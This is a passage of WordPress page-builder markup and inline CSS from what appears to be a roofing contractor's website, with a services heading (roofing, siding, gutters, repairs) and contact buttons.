type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-bf607241-86b3-436c-b825-588f4943f62b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ec57e435-714e-4975-952b-ed92e27ed276\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-ec57e435-714e-4975-952b-ed92e27ed276 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"158f9bfc-d2b9-42eb-a8e5-6e47c7efa463\"} -->\n<style type=\"text/css\"> .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"a48ef254-6b43-4feb-8c98-8e16ec4b8e54\"} -->\n<style type=\"text/css\"> .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ef3dd585-c3d3-4834-b0d3-f1366fbd631e\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"fe4fc405-1b76-43db-8c2c-923bb96f2ab2\"} -->\n<style type=\"text/css\"> .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"ad526e6a-3ac5-4787-98b4-b4a08deb4fd3\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"9ccb550a-9017-4524-9954-a7be7540627b\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-9ccb550a-9017-4524-9954-a7be7540627b background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dba5a57c-6107-4f82-a964-673588d98dce\"} -->\n<style type=\"text/css\"> .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dba5a57c-6107-4f82-a964-673588d98dce skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"0b9e5611-3349-4218-a906-00718b0363e1\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: 